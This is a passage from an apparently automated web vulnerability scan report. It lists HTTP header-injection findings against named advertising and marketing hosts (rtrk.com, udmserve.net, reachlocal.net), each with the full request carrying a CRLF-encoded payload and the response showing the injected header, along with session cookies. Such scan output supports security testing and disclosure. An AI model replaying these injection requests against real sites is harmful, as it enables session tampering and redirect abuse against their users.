Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:34 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3160904156a23c7e8c69dff72; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR16090415e6ca9e4734959b1; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:34 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk6b47c
72c5727bcc8
Content-Length: 382
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://landing.optionshouse.com/rate/395/yhofin ...[SNIP]...
1.4. http://redirect.rtrk.com/redirect [RL_ckstr parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redirect.rtrk.com
Path: /redirect
Issue detail
The value of the RL_ckstr request parameter is copied into the Set-Cookie response header. The payload 116f0%0d%0afc7a19355f0 was submitted in the RL_ckstr parameter. This caused a response containing an injected HTTP header.
Request
GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0116f0%0d%0afc7a19355f0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:48 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0116f0
fc7a19355f0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 587
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:41 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?scid=2323693 ...[SNIP]...
1.5. http://redirect.rtrk.com/redirect [RL_qstr parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redirect.rtrk.com
Path: /redirect
Issue detail
The value of the RL_qstr request parameter is copied into the Location response header. The payload d0f4f%0d%0a6e008c98e33 was submitted in the RL_qstr parameter. This caused a response containing an injected HTTP header.
Request
GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=d0f4f%0d%0a6e008c98e33&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?d0f4f
6e008c98e33
Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:40 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?d0f4f 6e008 ...[SNIP]...
1.6. http://redirect.rtrk.com/redirect [RL_rurl parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redirect.rtrk.com
Path: /redirect
Issue detail
The value of the RL_rurl request parameter is copied into the Location response header. The payload b10dd%0d%0a3788128dbfd was submitted in the RL_rurl parameter. This caused a response containing an injected HTTP header.
Request
GET /redirect?RL_rurl=b10dd%0d%0a3788128dbfd&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:37 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: b10dd
3788128dbfd?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 571
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:29 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="b10dd 3788128dbfd?scid=2323693&cid=837045& ...[SNIP]...
1.7. http://udmserve.net/udm/img.fetch [dt cookie]
Summary
Severity: High
Confidence: Certain
Host: http://udmserve.net
Path: /udm/img.fetch
Issue detail
The value of the dt cookie is copied into the Set-Cookie response header. The payload 6ab88%0d%0a0adc77508cd was submitted in the dt cookie. This caused a response containing an injected HTTP header.
Request
GET /udm/img.fetch?sid=2900;tid=1;ev=1;dt=1; HTTP/1.1
Host: udmserve.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=4;sz=728x90;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: udm1=9173:1:63440343934:1:2900:0:0:63440343934:1:1|; dt=6ab88%0d%0a0adc77508cd; __qca=P0-679846959-1315331134624

Response
HTTP/1.1 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT"
Set-Cookie: udm1=9173:1:63440344253:14:2900:0:0:63440344253:1:1|; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:50:53 GMT
Set-Cookie: dt=6ab88
0adc77508cd; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12: 50:53 GMT
Expires: Mon, 05 Sep 2011 12:50:53 GMT
Date: Tue, 06 Sep 2011 12:50:53 GMT
Content-Type: text/html; charset=ISO-8859-1
Server: lighttpd/1.4.28
Content-Length: 1337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"> < ...[SNIP]...
1.8. http://utdi.reachlocal.net/images/Bottom_facebook.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/Bottom_facebook.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 2516f%0d%0a0b50936584 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2516f%0d%0a0b50936584/Bottom_facebook.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:20 GMT
Server: Apache
Location: http://utdi.com/2516f
0b50936584/Bottom_facebook.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:13 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/2516f 0b50936584/Bottom_facebo ...[SNIP]...
1.9. http://utdi.reachlocal.net/images/Rsidepanel_CSportalHead.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/Rsidepanel_CSportalHead.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 54340%0d%0a57bb639a64e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /54340%0d%0a57bb639a64e/Rsidepanel_CSportalHead.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:50 GMT
Server: Apache
Location: http://utdi.com/54340
57bb639a64e/Rsidepanel_CSportalHead.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/54340 57bb639a64e/Rsidepanel_C ...[SNIP]...
1.10. http://utdi.reachlocal.net/images/Rsidepanel_ID-contact.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/Rsidepanel_ID-contact.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload ae4cb%0d%0a0096e3364fc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /imagesae4cb%0d%0a0096e3364fc/Rsidepanel_ID-contact.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/imagesae4cb
0096e3364fc/Rsidepanel_ID-contact.jpg
Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/imagesae4cb 0096e3364fc/Rsidep ...[SNIP]...
1.11. http://utdi.reachlocal.net/images/Rsidepanel_ID-pr.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/Rsidepanel_ID-pr.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 3eb55%0d%0aefef98aca08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /images3eb55%0d%0aefef98aca08/Rsidepanel_ID-pr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/images3eb55
efef98aca08/Rsidepanel_ID-pr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/images3eb55 efef98aca08/Rsidep ...[SNIP]...
1.12. http://utdi.reachlocal.net/images/Rsidepanel_ID-specials.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/Rsidepanel_ID-specials.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload cbce7%0d%0a95d968751a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /cbce7%0d%0a95d968751a4/Rsidepanel_ID-specials.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:23 GMT
Server: Apache
Location: http://utdi.com/cbce7
95d968751a4/Rsidepanel_ID-specials.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:15 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/cbce7 95d968751a4/Rsidepanel_I ...[SNIP]...
1.13. http://utdi.reachlocal.net/images/Rsidepanel_UTDI-G.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/Rsidepanel_UTDI-G.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload ca126%0d%0a0d553889d45 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ca126%0d%0a0d553889d45/Rsidepanel_UTDI-G.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/ca126
0d553889d45/Rsidepanel_UTDI-G.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/ca126 0d553889d45/Rsidepanel_U ...[SNIP]...
1.14. http://utdi.reachlocal.net/images/Rsidepanel_UTDiStore.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/Rsidepanel_UTDiStore.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 36ce5%0d%0aa169a199146 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /36ce5%0d%0aa169a199146/Rsidepanel_UTDiStore.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:23 GMT
Server: Apache
Location: http://utdi.com/36ce5
a169a199146/Rsidepanel_UTDiStore.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:15 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/36ce5 a169a199146/Rsidepanel_U ...[SNIP]...
1.15. http://utdi.reachlocal.net/images/Rsidepanel_btm.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/Rsidepanel_btm.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 8ea78%0d%0a6eb580edc8f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8ea78%0d%0a6eb580edc8f/Rsidepanel_btm.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:28 GMT
Server: Apache
Location: http://utdi.com/8ea78
6eb580edc8f/Rsidepanel_btm.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:21 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://utdi.com/8ea78 6eb580edc8f/Rsidepanel_b ...[SNIP]...
1.16. http://utdi.reachlocal.net/images/Rsidepanel_mid-specials.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/Rsidepanel_mid-specials.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload fa623%0d%0a91d1427d552 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /fa623%0d%0a91d1427d552/Rsidepanel_mid-specials.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
